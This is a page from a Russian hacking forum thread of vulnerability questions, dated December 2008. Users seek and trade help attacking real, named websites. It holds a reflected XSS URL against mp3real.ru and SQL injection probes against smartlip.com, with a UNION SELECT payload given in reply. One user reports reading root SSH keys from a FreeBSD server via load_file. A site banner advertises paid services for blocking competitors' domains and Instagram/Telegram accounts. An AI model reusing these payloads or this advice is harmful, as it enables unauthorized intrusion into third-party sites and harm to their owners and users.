Ваши вопросы по уязвимостям.

FORUMS

MEMBERS

RECENT POSTS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 403 из 2422

403

Опции темы

Поиск в этой теме

Опции просмотра

06.12.2008, 20:00

~~Велемир~~

Banned

Регистрация: 19.06.2006

Сообщений: 1,239

Провел на форуме:
1469161

Репутация: 142

При чтении load_file-ом нашёл публичные ключи в ./root/.ssh/authorized_keys:

bЃ .authorized_keys.nV0WVg bЃ Иauthorized_keys

Справа отчётливо имя файла authorized_keys,а слева что за херня ? Юзал SIPT 4.0

Система - FreeBSD

И ещё: кучу всякого в var/tmp валяется,включая идентификаторы сессий.

mysql-5.tgz к примеру.

𝕏 Twitter Reddit Telegram Копировать ссылку

Последний раз редактировалось Велемир; 06.12.2008 в 20:13..

07.12.2008, 01:26

geforce

Постоянный

Регистрация: 21.08.2008

Сообщений: 302

Провел на форуме:
458686

Репутация: -25

Существует ли способ обойти функцыю htmlspecialchars(); если да то как?

07.12.2008, 02:19

~~Велемир~~

Banned

Регистрация: 19.06.2006

Сообщений: 1,239

Провел на форуме:
1469161

Репутация: 142

А чё её обходить,если она и так не работает : DD

07.12.2008, 03:07

sabe

Постоянный

Регистрация: 16.03.2007

Сообщений: 380

Провел на форуме:
1404552

Репутация: 568

Отправить сообщение для sabe с помощью AIM

Отправить сообщение для sabe с помощью Yahoo

geforce

для хсс врятле обойдеш... скуля хз, помоему тоже..

есть тема уже, о ее безопастности )
https://forum.antichat.ru/showthread.php?t=64500

Последний раз редактировалось sabe; 07.12.2008 в 04:45..

07.12.2008, 04:42

o3,14um

Участник форума

Регистрация: 16.11.2006

Сообщений: 230

Провел на форуме:
599789

Репутация: 227

Если аргумент не в кавычках то скулю можно забомбить

07.12.2008, 17:54

SHS

Познающий

Регистрация: 04.08.2008

Сообщений: 53

Провел на форуме:
63941

Репутация: 2

Помоему на простые вопросы есть банально простой раздел... Может я ошибаюсь?

07.12.2008, 19:47

AARON

Участник форума

Регистрация: 29.04.2008

Сообщений: 106

Провел на форуме:
647733

Репутация: 46

Помогите с интересным сайтом. это mp3real.ru. Дырявый, шопи**ец. Ничерта в поиске не фильтруется... нашел пассивную xss
http://www.mp3real.ru/search/?type=art&q="><script>alert()<script>
и нашел вроде бы sql inj , но не уверен. Если и скуль, то очень странный. Ошибку вызывает запрос
http://www.mp3real.ru/search/?type=art&q=<'' (две одиннарные)
Вопрос - как развернуть inj? У кого-нить есть предложения по этому поводу?

07.12.2008, 20:05

-m0rgan-

Постоянный

Регистрация: 29.09.2008

Сообщений: 553

Провел на форуме:
2584134

Репутация: 519

AARON,нету там sql иньекта...

07.12.2008, 20:37

Thrasher88

Познающий

Регистрация: 18.04.2008

Сообщений: 62

Провел на форуме:
279406

Репутация: 37

Подскажите, есть инъекции или нет.. непойму, вроде все "признаки" указывают на скулю, а вот что тто даже рабочие поля выявить не получается

Код:

http://smartlip.com/symbian/fileshare/flist.php?cat=1'

Код:

http://smartlip.com/adv/?id=1'

Заранее, спасибо!

#10

07.12.2008, 20:41

AFoST

Members of Antichat - Level 5

Регистрация: 28.05.2007

Сообщений: 729

Провел на форуме:
5571194

Репутация: 1934

http://smartlip.com/symbian/fileshare/flist.php?cat=-1'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13+from +information_schema.tables--%20%201
слепая скул

Страница 403 из 2422

403

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

Home

Help

Terms and Rules